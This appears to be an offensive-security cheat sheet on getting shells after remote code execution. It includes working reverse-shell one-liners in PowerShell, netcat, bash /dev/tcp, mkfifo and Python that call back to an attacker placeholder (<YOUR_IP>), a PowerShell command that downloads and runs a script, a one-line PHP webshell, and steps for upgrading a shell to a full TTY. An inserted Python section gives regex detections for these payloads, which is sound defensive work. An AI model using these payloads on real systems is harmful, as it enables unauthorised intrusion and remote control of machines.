Shells
If you have successfully exploited a vulnerability on a system and obtained Remote Code Execution (RCE), you can use it to obtain a shell on the remote system.
Depending on the type of connection with the shell, whether it is interactive and whether the payload is staged, we can classify shells into the following categories.
Reverse shells are when the target is forced to execute code that connects back to your computer. Reverse shells are an excellent way to bypass firewall rules that may prevent you from connecting to arbitrary ports on the target. However, when receiving a reverse shell from a machine across the Internet, you must configure your own network or use third-party tools to obtain the shell.
Bind shells are when the executed code starts a listener on a port of the target and attaches a shell directly to it. In some cases this port is reachable from the Internet; otherwise it requires configuring the target network to allow port forwarding for that specific port. You then connect to that port and gain remote code execution. This has the advantage of not requiring any configuration on your own network, but it may be blocked by firewalls protecting the target.
Staged payloads are sent in two parts:
- The first part, called the stager, does not contain any shellcode; it is executed directly on the target and connects back to the attacker to download the actual payload.
- The second part is the actual payload, which is executed directly in memory, preventing it from being written to disk where traditional anti-virus could catch it.
Staged payloads require a particular listener, usually the Metasploit multi/handler, capable of sending the different stages and receiving the final reverse shell.
Stageless payloads are entirely self-contained in one piece of code that sends a shell back to the waiting listener immediately when executed.
Note: To differentiate between staged and stageless payloads in Metasploit and msfvenom, staged payload names look like windows/shell/reverse_tcp, while stageless ones look like windows/shell_reverse_tcp.
Interactive shells allow you to interact with programs like vim, nano and sudo and to use key combinations like [Ctrl]+c and [Ctrl]+l. Examples of interactive shells are PowerShell, Bash, Zsh and sh.
Non-interactive shells limit the attacker to programs that do not require user interaction, like grep, whoami or cat. Unfortunately, the majority of simple reverse and bind shells are of this type, which makes further exploitation trickier.
Nonetheless, depending on the environment, a non-interactive shell can be upgraded to a full TTY one.
In this subsection, you can find a list of web pages with payloads for obtaining reverse or web shells.
# shell.ps1
$client = New-Object System.Net.Sockets.TCPClient("<YOUR_IP>",<LISTENING_PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
# COMMAND
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<YOUR_IP>/shell.ps1')"
- Start a shell in a new process.
Start-Process -NoNewWindow powershell "iex (New-Object Net.WebClient).DownloadString('http://<YOUR_IP>/shell.ps1')"
- Netcat
# https://github.com/int0x33/nc.exe/raw/master/nc64.exe
nc.exe -e cmd.exe <YOUR_IP> <LISTENING_PORT>
bash -i >& /dev/tcp/<YOUR_IP>/<LISTENING_PORT> 0>&1
nc -e /bin/sh <YOUR_IP> <LISTENING_PORT>
touch /tmp/f; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <YOUR_IP> <LISTENING_PORT> > /tmp/f
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<YOUR_IP>",<LISTENING_PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
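Defensive counterpart to the one-liners above, added here as an example and not part of the original cheat sheet: each of these payloads leaves a distinctive fragment in the process command line (auditd EXECVE records, Sysmon event 1, shell history), so a detection can be written as a small set of regular expressions over command lines. The Python below derives one indicator per payload shown on this page and runs them over a handful of constructed command lines; the address 10.0.0.5, port 4444, the indicator names and the helper names are assumptions of this example, and the benign lines are there to show what must not fire.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Indicators derived from the reverse-shell one-liners on this page, as
# (name, compiled regex). The Windows patterns are case-insensitive because
# PowerShell and cmd.exe accept any casing; the indicator names are our own.
INDICATORS = [
    ("bash /dev/tcp redirect",
     re.compile(r"/dev/tcp/[\w.-]+/\d+")),
    ("netcat -e shell",
     re.compile(r"\bnc(?:\.exe)?\b.*\s-e\s+(?:/bin/(?:ba)?sh|cmd(?:\.exe)?)\b")),
    ("mkfifo netcat pipe",
     re.compile(r"mkfifo\s+\S+.*\|\s*nc\b")),
    ("python socket dup2 shell",
     re.compile(r"socket\.socket\(.*os\.dup2\(.*subprocess")),
    ("powershell download cradle",
     re.compile(r"\biex\b\s*\(?\s*New-Object\s+(?:System\.)?Net\.WebClient\)\.DownloadString", re.I)),
    ("powershell TCPClient shell",
     re.compile(r"New-Object\s+System\.Net\.Sockets\.TCPClient\(", re.I)),
]

# IPv4 address followed, within a few characters, by a port number.
ENDPOINT_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})\D{1,4}(\d{2,5})\b")

# Constructed sample command lines (placeholder attacker 10.0.0.5:4444).
SAMPLE_COMMAND_LINES = [
    "bash -i >& /dev/tcp/10.0.0.5/4444 0>&1",
    "nc -e /bin/sh 10.0.0.5 4444",
    "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.5 4444 > /tmp/f",
    "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
    "s.connect((\"10.0.0.5\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);"
    "os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",
    "powershell -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://10.0.0.5/shell.ps1')\"",
    "nc.exe -e cmd.exe 10.0.0.5 4444",
    '$client = New-Object System.Net.Sockets.TCPClient("10.0.0.5",4444);$stream = $client.GetStream()',
    "grep -r TODO /srv/app",             # benign
    "nc -zv db.internal 5432",           # benign port check, no -e
    "curl -s http://10.0.0.5/health",    # benign
]


@dataclass
class Finding:
    index: int               # position of the command line in the input
    indicator: str           # which indicator fired
    excerpt: str             # the matched fragment
    endpoint: Optional[str]  # "ip:port" the shell connects to, if recoverable


def extract_endpoint(cmd: str) -> Optional[str]:
    """Return 'ip:port' for the first IPv4/port pair in the command, else None."""
    m = ENDPOINT_RE.search(cmd)
    return f"{m.group(1)}:{m.group(2)}" if m else None


def scan(lines: List[str]) -> List[Finding]:
    """Run every indicator over every command line; one Finding per hit."""
    findings = []
    for i, cmd in enumerate(lines):
        for name, rx in INDICATORS:
            m = rx.search(cmd)
            if m:
                findings.append(Finding(i, name, m.group(0), extract_endpoint(cmd)))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_COMMAND_LINES):
        print(f"line {f.index}: {f.indicator} -> {f.endpoint or 'no endpoint'} ({f.excerpt!r})")
```

The endpoint helper is deliberately loose: the download cradle carries only a URL, so it yields no endpoint and the finding stands on the indicator alone. In production the patterns would be fed from the command-line field of the telemetry source rather than from a list, and any hit on the three PowerShell and netcat indicators is worth alerting on by itself, since legitimate administration rarely pipes a shell into a network socket.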
By default, Kali Linux ships a set of web shells under /usr/share/webshells/. Nevertheless, here is a list with more web shell payloads:
A very simple PHP webshell that runs the value of the c GET parameter.
<?=`$_GET[c]`?>
A simple way to spawn a TTY shell in Linux is by executing the following commands. Nonetheless, you can find more ways to obtain a fully interactive TTY shell in the following link.
python3 -c "import pty; pty.spawn('/bin/bash')"
# Background the remote shell with Ctrl+z, then run the next line in your local terminal
<Ctrl+z>
stty raw -echo; fg
# If reset asks for the terminal type, answer "screen"
reset
screen
export TERM=screen;export SHELL=/bin/bash;
stty rows <ROWS> columns <COLUMNS>
Note: To obtain the number of rows and columns of your terminal, type stty -a.
On Windows, it is not possible to obtain a fully interactive TTY shell. However, we can get something close, even though it is still not truly interactive.
Thanks to rlwrap, the attacker can edit commands before sending them and have a command history.
rlwrap nc -nvlp <LISTENING_PORT>
Another, more elaborate alternative is ConPtyShell, a fully interactive reverse shell for Windows. However, it can be detected by AVs.
How to check whether you are in a 32- or 64-bit process:
[Environment]::Is64BitProcess
[IntPtr]::Size
- If the pointer size is 4 -> 32-bit process
- If the pointer size is 8 -> 64-bit process
To jump to a 64-bit process from a 32-bit one, run the following PowerShell executable (the sysnative alias is only resolved by the file-system redirector for 32-bit processes on 64-bit Windows).
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe